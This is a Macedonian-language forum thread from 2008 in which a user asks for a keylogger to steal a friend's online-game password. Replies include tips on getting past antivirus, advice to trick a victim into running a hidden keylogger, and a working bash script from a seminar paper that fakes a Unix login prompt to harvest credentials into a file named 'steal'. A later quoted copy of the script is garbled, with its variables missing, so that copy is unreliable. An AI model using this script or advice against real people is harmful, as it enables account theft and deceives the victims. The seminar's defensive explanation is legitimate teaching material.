• Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

keylock-eri i drugi bezopasni virusi

Статус
Затворена за нови мислења.
 • Ја почнал/а темата
 • #1

_zare_

Intern
10 февруари 2008
137
0
zdravo dali bi mozel nekoj da mi dade nekoj keylocker i drugi bezopasni virusi.

eden "drugar" celo vreme me "zafrkavase" pa sakam da ja vratam uslugata

ako temava nee prifatena otstranete ja samo ve molam bes baniranje denes se prijaviv ;)
 

Aleks

Gaining Experience
18 мај 2007
5,748
288
Vo deneshno vreme site keylogeri se identifikuvano od antivirusite kako opasni raboti... I ne veruvam deka kje mozesh da go zaobikolesh antivirusot za da mozesh da instalirash keyloger. PS: Ne postojat bezopasni virusi, postojat Evil programi
 
 • Ја почнал/а темата
 • #4

_zare_

Intern
10 февруари 2008
137
0
Vo deneshno vreme site keylogeri se identifikuvano od antivirusite kako opasni raboti... I ne veruvam deka kje mozesh da go zaobikolesh antivirusot za da mozesh da instalirash keyloger. PS: Ne postojat bezopasni virusi, postojat Evil programi
koga rekov besopasni mislev na lazni a so keylocker znam kako da zaobikolam antivirus ne se grizi ti za toa :tainstven:
 
 • Ја почнал/а темата
 • #5

_zare_

Intern
10 февруари 2008
137
0
inace jas baram eden keylocker so koj koga ke pise nekoj log in na nekoja igra na internet od kaj tebe so ednostavno pritiskanje na nekolku kopcinja mozes da ja dovedes lozinkata pred tebe
iako vo svezdi pak mozes da vlezes(drugar mi ima takov ama ne go dava)
 

vik

Intern
14 април 2007
1,936
31
И јас сакам да го видам ова заобиколување.
И една корекција...не е keylocker туки keyloger, ако не сум грешка. ;)
 

vasildb

Intern
17 април 2007
209
6
Со две г.:D
Иначе, има keylogger кој не го идентификува антивирус. Само повеќето игри имаат заштита од такви алатки.
 

Aleks

Gaining Experience
18 мај 2007
5,748
288
Igra zastita od keyloger? prv pat slusham.. Se shto se deshava na tastaturata keylogerot kje go fati, bez razlika dali e vo igra, MSN, IRC etc...
 

Blagojce

Gaining Experience
26 декември 2007
895
73
Прилеп
Blagojce's setup  
Processor & Cooler
Intel Core i5-3570 3.40GHz
Storage
2 TB
RAM
8 GB
Monitor
ASUS 24" LED Full HD
OS
Windows 10
Keyloger-от се снима од тастатурата,само за на некого да инсталираш keyloger треба повеќе да се разбираш од хакерство, не е се како што мислат дај ми keyloger и јас .....одма хакер.:)
 

Aleks

Gaining Experience
18 мај 2007
5,748
288
Keyloger-от се снима од тастатурата,само за на некого да инсталираш keyloger треба повеќе да се разбираш од хакерство, не е се како што мислат дај ми keyloger и јас .....одма хакер.:)
haker... hm... za da instalirash keyloger cnaci deka poima nemash od hakerstvo.. shto se podrazbira pod haker? on shto znae komaj SVE vo veze so kompjuteri.. i na toj covek 100% ne bi mu nadnalo na up da koristi keyloger.
 
 • Ја почнал/а темата
 • #13

_zare_

Intern
10 февруари 2008
137
0
ako sakate da vi kazam kako da zaobikolam antivirus ok
mnogu e prosto vsusnost na primer mojot anti virus odma gi delitnuva kiloggerite stom gi odzipiram pa ima 2 opcii
1. ke napravis disable na antivirusot dur koristis keyloger ama treba da si mnogu vnimatelen
2. stom ke go odzipiram odma go aktiviram i ne mu davam sansa na antivirusot da go delitne
:)
 

Aleks

Gaining Experience
18 мај 2007
5,748
288
Hm... lol, a kaj nego kako kje go iskluces ? :pPP inache, novite AV imaat proceduri koi kje go isklucat keylogerot od rabotata vo pozadina i kje go izbrisat
 

vasildb

Intern
17 април 2007
209
6
Igra zastita od keyloger? prv pat slusham.. Se shto se deshava na tastaturata keylogerot kje go fati, bez razlika dali e vo igra, MSN, IRC etc...
Можеби не се искажав како што треба, мислев на online игри каде што можат да се украдат лични информации, меѓу кои password-от и user-от од играта.
Еве конкретно, пробај на Conquer Online со Ardamax Keylogger кои многумина го мислат за најдобар. И види дали ќе може да ги фати тие податоци.
Сум пробал и со custom coded keylogger, со истата игра, пак не биваше.
А keylogger што се' фаќа... епа има хардверски keyloggeri кои се приклучуваат помеѓу тастатурата и матичната плоча, односно, местото каде што се пренесуваат податоците од тастатурата во системот. Е тој фаќа се, иначе другиве се привремено добри, додека не ги затнат.:))
 
 • Ја почнал/а темата
 • #17

_zare_

Intern
10 февруари 2008
137
0
Можеби не се искажав како што треба, мислев на online игри каде што можат да се украдат лични информации, меѓу кои password-от и user-от од играта.
Еве конкретно, пробај на Conquer Online со Ardamax Keylogger кои многумина го мислат за најдобар. И види дали ќе може да ги фати тие податоци.
Сум пробал и со custom coded keylogger, со истата игра, пак не биваше.
А keylogger што се' фаќа... епа има хардверски keyloggeri кои се приклучуваат помеѓу тастатурата и матичната плоча, односно, местото каде што се пренесуваат податоците од тастатурата во системот. Е тој фаќа се, иначе другиве се привремено добри, додека не ги затнат.:))
abe brat jas bas za taa igra zboruvam eden drugar na conquer online iskoristil keyloger
neznam koj ne kazuva kopiljot
 

Blagojce

Gaining Experience
26 декември 2007
895
73
Прилеп
Blagojce's setup  
Processor & Cooler
Intel Core i5-3570 3.40GHz
Storage
2 TB
RAM
8 GB
Monitor
ASUS 24" LED Full HD
OS
Windows 10
Не мора сите keloger-и да бидат детектни има keylogeri кои се недетектни, а најубаво најди некој keloger и на жртвата смести му го во некоја игра или слично, па зипувај го и малку позанимавај се со Social Engineering и прелажи го да го активира keyloger-от.:LOL:
 

DaciSS

Gaining Experience
3 јануари 2008
949
288
San Francisco
www.linkedin.com
Del od edna moja seminarska...

Keylogger

Претставува едноставен тип на измама. Кеylogger претставува програм кој се стартува заедно со оперативниот систем и има за задача да го зачува целиот текст внесен преку тастатурата. Корисниците на компјутерот на кој има инсталирано keylogger не се свесни дека некој цело време ги прати што пишуваат, бидејќи keylogger-от работи во невидлив мод (stealth mod) т.е. нема икони од keylogger-от на desktop и во старт менито, папката во Program Files каде што е инсталиран е Hidden, програмот не го јавува во Task Menager и во
Control panel во Add or Remove programs. Текстот се зачуваува во .txt датотека и може да биде пристапен директно од компјутерот на кој е инсталиран keylogger-от или пак автоматски на предефиниран временски интервал датотеката да се праќа на меилот на измамникот.Слика: Преглед на Log дтотеката

Повеќето од корисниците мислат дека со користење на On-Screen Keyboard дека ќе бидат заштитени од Кеylogger (истото го мислев и јас, но сега го докажав спротивното)!!!!!!!!!!Слика: On-Screen Keyboard

Освен софтверски, постојат и хардверски keyloggers кои се инсталираат на кабелот од тастатурата.


Слика: KeyGhost SX 512КB Слика:Маgnum 4МB

Еве едно мое софтверско решение за keylogger (идејата ја добив од книгата оперативен систем Unix од Д.Чакмаков и В.Радевски)

bash MojKeylogger_v1.1

clear
touch steal
echo -n "login as:"
stty echo
read a
echo "Using keyboard-interactive authentication."
echo -n "Password:"
stty -echo
read b
stty echo
echo "Last login: Tue Jan 15 22:09:18 2008 from 79.126.133.216"
echo "NetBSD 3.0 (GENERIC) #0: Mon Dec 19 04:05:17 UTC 2005"
echo " "
echo "Welcome to NetBSD!"
echo "-bash-3.1$"
echo $a $b>>steal
terminal=`tty|cut -c6-12`
count=0
for var in `ps -t $terminal |awk '{print $1}' `
do
count=`expr $count + 1`
if [ $count -gt 1 ]
then
kill -9 $var
fi
done

Напомена: Keyloggerov го напишав специјално за семинарскава, го тестирав на мојот account и работи, не е пожелно да се користи во лабораториите на универзитетот за крадење на account-итет на колегите!!!!!

Како работи MojKeylogger_v1.1?

Се вклучувате со сопственото корисничко име и лозинка и ја стартувате скриптата. Со командата clear се брише се она што претходно сте го напишале (во систем со Unix, но во PuTTy не се брише туку само се оди надоле додека не се дојде до чист прозор, се што било искуцано може да видиме доколку со слајдерот се вратиме нагоре ), а потоа печати порака за логирање. Корисникот кој ќе седне на компјутерот на кој е стартувана скриптата ќе помисли дека никој не е логиран и ќе го внесе своето корисничко име и лозинка, тие ќе се зачуваат во датотеката steal и целиот систем ќе терминира. Корисникот ќе помисли дека настанала некоја грешка со PuTTy и повторно ќе го вклучи и успешно ќе се логира на својот account. Тогаш корисникот кој ја стартувал скриптата може од било кој компјутер да се вклучи на својот account да ја отвори датотеката steal и да ги види корисничкото име и лозинка на жртвата без таа да биде свесан за тоа.
Доколку корисникот предвремено свати дека има пуштено некоја скрипта во позадина, тој може да ја прекине скриптата со Ctrl-C со што ќе го има accountot на напаѓачот и ќе може што сака да направи со него, пример да ја искористи командата passwd со што ќе ја смени лозинката на напаѓачот и тој веќе да не биде во состојба да се логира на системот и да продолжи да прави проблеми на колегите.

Заштита од овој тип на измама:
• Инсталирајте Anti-Keylogger на системот
• Проверете дали на кабелот од тастатурата има инсталирано хардверски уред за пратење
• Кога ќе треба да внесувате user i pass во некоја форма, не ги куцајте преку тастатурата, туку имајте си ги зачувано во датотека и само направете им copy-paste
 
 • Ја почнал/а темата
 • #21

_zare_

Intern
10 февруари 2008
137
0
Del od edna moja seminarska...

Keylogger

Претставува едноставен тип на измама. Кеylogger претставува програм кој се стартува заедно со оперативниот систем и има за задача да го зачува целиот текст внесен преку тастатурата. Корисниците на компјутерот на кој има инсталирано keylogger не се свесни дека некој цело време ги прати што пишуваат, бидејќи keylogger-от работи во невидлив мод (stealth mod) т.е. нема икони од keylogger-от на desktop и во старт менито, папката во Program Files каде што е инсталиран е Hidden, програмот не го јавува во Task Menager и во
Control panel во Add or Remove programs. Текстот се зачуваува во .txt датотека и може да биде пристапен директно од компјутерот на кој е инсталиран keylogger-от или пак автоматски на предефиниран временски интервал датотеката да се праќа на меилот на измамникот.Слика: Преглед на Log дтотеката

Повеќето од корисниците мислат дека со користење на On-Screen Keyboard дека ќе бидат заштитени од Кеylogger (истото го мислев и јас, но сега го докажав спротивното)!!!!!!!!!!Слика: On-Screen Keyboard

Освен софтверски, постојат и хардверски keyloggers кои се инсталираат на кабелот од тастатурата.


Слика: KeyGhost SX 512КB Слика:Маgnum 4МB

Еве едно мое софтверско решение за keylogger (идејата ја добив од книгата оперативен систем Unix од Д.Чакмаков и В.Радевски)

bash MojKeylogger_v1.1

clear
touch steal
echo -n "login as:"
stty echo
read a
echo "Using keyboard-interactive authentication."
echo -n "Password:"
stty -echo
read b
stty echo
echo "Last login: Tue Jan 15 22:09:18 2008 from 79.126.133.216"
echo "NetBSD 3.0 (GENERIC) #0: Mon Dec 19 04:05:17 UTC 2005"
echo " "
echo "Welcome to NetBSD!"
echo "-bash-3.1$"
echo >>steal
terminal=`tty|cut -c6-12`
count=0
for var in `ps -t |awk '{print $1}' `
do
count=`expr + 1`
if [ -gt 1 ]
then
kill -9
fi
done

Напомена: Keyloggerov го напишав специјално за семинарскава, го тестирав на мојот account и работи, не е пожелно да се користи во лабораториите на универзитетот за крадење на account-итет на колегите!!!!!

Како работи MojKeylogger_v1.1?

Се вклучувате со сопственото корисничко име и лозинка и ја стартувате скриптата. Со командата clear се брише се она што претходно сте го напишале (во систем со Unix, но во PuTTy не се брише туку само се оди надоле додека не се дојде до чист прозор, се што било искуцано може да видиме доколку со слајдерот се вратиме нагоре ), а потоа печати порака за логирање. Корисникот кој ќе седне на компјутерот на кој е стартувана скриптата ќе помисли дека никој не е логиран и ќе го внесе своето корисничко име и лозинка, тие ќе се зачуваат во датотеката steal и целиот систем ќе терминира. Корисникот ќе помисли дека настанала некоја грешка со PuTTy и повторно ќе го вклучи и успешно ќе се логира на својот account. Тогаш корисникот кој ја стартувал скриптата може од било кој компјутер да се вклучи на својот account да ја отвори датотеката steal и да ги види корисничкото име и лозинка на жртвата без таа да биде свесан за тоа.
Доколку корисникот предвремено свати дека има пуштено некоја скрипта во позадина, тој може да ја прекине скриптата со Ctrl-C со што ќе го има accountot на напаѓачот и ќе може што сака да направи со него, пример да ја искористи командата passwd со што ќе ја смени лозинката на напаѓачот и тој веќе да не биде во состојба да се логира на системот и да продолжи да прави проблеми на колегите.

Заштита од овој тип на измама:
• Инсталирајте Anti-Keylogger на системот
• Проверете дали на кабелот од тастатурата има инсталирано хардверски уред за пратење
• Кога ќе треба да внесувате user i pass во некоја форма, не ги куцајте преку тастатурата, туку имајте си ги зачувано во датотека и само направете им copy-paste
moze malku poednostavno ja sakam da znam kako da ja otvoram skriptata (bat,exe...) i posle kako da go najdam akauntot i pasvordot vo toa steal
i steal so sto da go otvoram (bat,exe...)?
pratoi odgovor poskoro fala.
 

Blagojce

Gaining Experience
26 декември 2007
895
73
Прилеп
Blagojce's setup  
Processor & Cooler
Intel Core i5-3570 3.40GHz
Storage
2 TB
RAM
8 GB
Monitor
ASUS 24" LED Full HD
OS
Windows 10
Како во последно време почнав да забележувам се повеќе членови се интересираат кој за хакерство, кој за туѓа IP, кој за сопствена IP.... Што се случува со луѓево одма сакаат хакери.
Мој совет е прво да научат за IP и портови, мрежи, некој програмски јазик(да не бидат script kiddies), а не само кажете некој keyloger итн. Сите мислат тоа така е хакерството така сите ќе биле хакери ако било толку лесно.
 

GeNeRaToR

Intern
20 јануари 2008
538
7
@Blagojce
Точно ---> Нека земат малце книги нека прочитат за нешто корисно.
P.S. Темата за како да направите вирус ја отворив бидејки мислев дека повеке луѓе ке се заинтересираат.
 
Статус
Затворена за нови мислења.

Нови мислења

Последни Теми

Статистика

Теми
43,671
Мислења
862,045
Членови
30,034
Најнов член
Goxo43
На врв Дно